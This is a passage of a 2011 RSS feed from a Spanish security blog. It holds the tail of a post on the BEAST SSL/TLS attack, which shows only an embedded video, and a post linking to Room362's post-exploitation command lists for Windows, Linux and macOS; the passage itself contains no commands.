&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="480" src="http://www.youtube.com/embed/BTqAIDVUvrU" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;

&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R &lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-7973026352958227180?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Q1w8nskMXYd_pTa5JR--JmEY5YE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q1w8nskMXYd_pTa5JR--JmEY5YE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Q1w8nskMXYd_pTa5JR--JmEY5YE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q1w8nskMXYd_pTa5JR--JmEY5YE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/k1BAH-kDDBg" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-28T20:35:36.657-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/--HzKtXQe78A/Tn4JqFIe71I/AAAAAAAAAYQ/c8_UD-MlGfo/s72-c/sneaker.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/09/beast-cifrado-ssltls-al-descubierto.html</feedburner:origLink></item><item><title>Lista de Comandos Post-Exploitation (Win, Linux &amp; Mac)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/PSLo8qbJOwM/lista-de-comandos-post-exploitation-win.html</link><category>Windows OS</category><category>Mac OS</category><category>Linux OS</category><category>CheatSheet</category><category>Textos</category><category>Fast-Info</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 22 Sep 2011 17:10:39 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3763858958237926954</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qmP3pKOPMz4/TnvNc8cHifI/AAAAAAAAAXM/SzntyKozW4I/s1600/linux-mac-os-x-windows-Post+Exploitation+Command+Lists.png" imageanchor="1" rel="lytebox" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://4.bp.blogspot.com/-qmP3pKOPMz4/TnvNc8cHifI/AAAAAAAAAXM/SzntyKozW4I/s400/linux-mac-os-x-windows-Post+Exploitation+Command+Lists.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Les traigo 3 documentos por cortesía de una iniciativa en &lt;a href="http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html?" target="_blank"&gt;&lt;b&gt;Room362.com&lt;/b&gt;&lt;/a&gt; donde se han elaborado listas de comandos útiles para después de una intrusión (Explotación) exitosa en los 3 sistemas operativos más populares (Windows, Linux y Mac).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Muy buena iniciativa, y lo mejor de todo es que todos podemos colaborar ampliando el material de estos textos alojados en Google Docs.&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Les dejo a continuación los textos:&lt;br /&gt;
*Si desean descargar: &lt;i&gt;&lt;b&gt;File&lt;/b&gt;&lt;/i&gt; -&amp;gt; &lt;b&gt;&lt;i&gt;Download as&lt;/i&gt; &lt;/b&gt;-&amp;gt; &lt;i&gt;&lt;b&gt;Formato&lt;/b&gt;&lt;/i&gt; (pdf, html, texto...)&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Windows Post-Exploitation Command List&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Linux/Unix/BSD Post-Exploitation Command List&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;a href="https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US" target="_blank"&gt;OSX Post-Exploitation Command List&lt;/a&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Source:&lt;/b&gt; &lt;a href="http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html" target="_blank"&gt;http://www.room362.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-3763858958237926954?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/N4uPCP98uZPLLK2-_d0ap9IPrqQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/N4uPCP98uZPLLK2-_d0ap9IPrqQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/N4uPCP98uZPLLK2-_d0ap9IPrqQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/N4uPCP98uZPLLK2-_d0ap9IPrqQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/PSLo8qbJOwM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-22T21:10:39.172-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-qmP3pKOPMz4/TnvNc8cHifI/AAAAAAAAAXM/SzntyKozW4I/s72-c/linux-mac-os-x-windows-Post+Exploitation+Command+Lists.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/09/lista-de-comandos-post-exploitation-win.html</feedburner:origLink></item><media:rating>nonadult</media:rating></channel></rss>

